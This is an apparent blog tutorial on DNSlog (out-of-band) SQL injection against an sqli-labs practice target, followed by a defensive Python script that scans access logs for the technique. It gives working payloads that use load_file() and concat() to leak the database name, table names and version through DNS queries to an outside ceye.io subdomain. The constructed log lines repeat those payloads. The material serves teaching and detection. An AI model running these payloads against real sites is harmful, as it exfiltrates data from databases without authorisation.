Detailed explanation of SQL DNSlog injection
2022-08-07 23:29:00 【Is always young】
Today I continue the series on Linux operation and maintenance; the topic of this article is SQL DNSlog injection.
Disclaimer:
The content of this article is for learning and exchange only. Using the techniques described here for illegal acts is strictly prohibited; anyone who does so bears full responsibility for the consequences!
Again: penetration testing of devices you are not authorized to test is strictly prohibited!
I. Introduction to SQL DNSlog injection
SQL DNSlog injection is a special way of retrieving the results of a SQL injection. Whether we use boolean-based or time-based blind SQL injection, there is a common problem: extracting data is slow. There are also special scenarios in which our payload is executed by the target site but the page gives no visible echo at all. In such cases we can use SQL DNSlog injection.
DNSlog SQL injection relies on the load_file() function, which reads the file at the path it is given; because that path can also point to a remote host (a UNC path of the form \\host\share), the function can reference remote locations. We therefore use concat() to build a path whose host name begins with the result of the SQL statement we want to evaluate, followed by a domain we control. When the database server tries to open that path it issues a DNS query for the host name, the DNS server we control records the query, and the recorded name carries the result of the SQL statement.
II. SQL DNSlog injection in practice
To perform DNSlog injection we first need a DNS server that answers queries normally and records every domain-name request it receives. http://ceye.io/ is a site that records DNS queries for a domain it assigns to us and can be used to implement DNSlog injection.
After we register, the site gives us a subdomain, underlined in red in the figure below:
Any DNS request for a name under that subdomain is recorded by the site and displayed to us.
Based on this, we can implement DNSLog injection.
We use sqli_lab as the practice target; the original page of the target looks like this:
http://192.168.136.2/sqli/Less-1/?id=1
First, we construct the DNSlog injection payload:
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select database()),'.ubhdz9.ceye.io\\abc'))--+
In the above payload, the select database() statement is embedded in concat() so that its result becomes the host-name part of the path passed to load_file(), which makes the database server issue a DNS query for that name.
Similarly, we can construct other payloads, such as one that queries a table name of the database:
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='security' limit 1,1),%27.ubhdz9.ceye.io\\abc'))--+
And one that queries the database version:
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select version()),'.ubhdz9.ceye.io\\abc'))--+
The result of executing the above payloads is shown in the following figure:
As the figure shows, our SQL DNSlog injection succeeded!
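As an added example that is not part of the original post, here is a small Python detector, written from the defender's side, that scans web-server access log lines for the load_file(concat('\\\\', ...)) pattern shown above and extracts the callback domain the data would be sent to. The log lines are constructed by me to mirror the shape of the payloads in this article, and the regular expressions are my own assumptions about what a request looks like after URL decoding.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); the query
# strings mirror the shape of the load_file()/concat() payloads discussed above.
SAMPLE_LOG = [
    '192.168.136.50 - - [07/Aug/2022:23:29:01 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 713',
    '192.168.136.50 - - [07/Aug/2022:23:29:05 +0800] "GET /sqli/Less-1/?id=1%27%20and%20load_file(concat(%27%5C%5C%5C%5C%27,(select%20database()),%27.ubhdz9.ceye.io%5C%5Cabc%27))--+ HTTP/1.1" 200 713',
    '192.168.136.50 - - [07/Aug/2022:23:29:09 +0800] "GET /sqli/Less-1/?id=1%27%20and%20LOAD_FILE(CONCAT(%27%5C%5C%5C%5C%27,(select%20version()),%27.ubhdz9.ceye.io%5C%5Cabc%27))--+ HTTP/1.1" 200 713',
    '192.168.136.51 - - [07/Aug/2022:23:30:00 +0800] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 720',
]

# Common log format: client ip, ident, user, [timestamp], "METHOD target proto"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')
# load_file( wrapping a concat( ... ), in any letter case and with optional spaces
LOADFILE_RE = re.compile(r'load_file\s*\(\s*concat\s*\(', re.IGNORECASE)
# The SQL literal '\\\\' that becomes the UNC prefix once the server parses it
UNC_RE = re.compile(r'\\\\')
# The DNS suffix the exfiltrated value is prepended to, e.g. '.ubhdz9.ceye.io\abc'
SUFFIX_RE = re.compile(r'\.([a-z0-9][a-z0-9.-]*\.[a-z]{2,})\\', re.IGNORECASE)

def decode_target(raw: str) -> str:
    """URL-decode the request target twice so double-encoded payloads are seen too."""
    return unquote_plus(unquote_plus(raw))

def detect_dnslog_injection(line: str):
    """Return (client_ip, timestamp, callback_domain) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, target = m.groups()
    decoded = decode_target(target)
    if not (LOADFILE_RE.search(decoded) and UNC_RE.search(decoded)):
        return None
    s = SUFFIX_RE.search(decoded)
    return ip, ts, (s.group(1) if s else "<unresolved>")

def scan(lines):
    """Scan log lines and collect findings; a real deployment would alert on each."""
    return [hit for hit in (detect_dnslog_injection(l) for l in lines) if hit]

if __name__ == "__main__":
    for ip, ts, domain in scan(SAMPLE_LOG):
        print(f"{ts} {ip} DNSlog-style SQLi attempt, callback domain: {domain}")
```

This catches the attempt at the web tier regardless of whether the database host would actually resolve the UNC host name; at the database tier, withholding the FILE privilege and restricting secure_file_priv keep load_file() from reaching such paths in the first place.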
Original work takes effort; please credit the source when reprinting: https://blog.csdn.net/weixin_40228200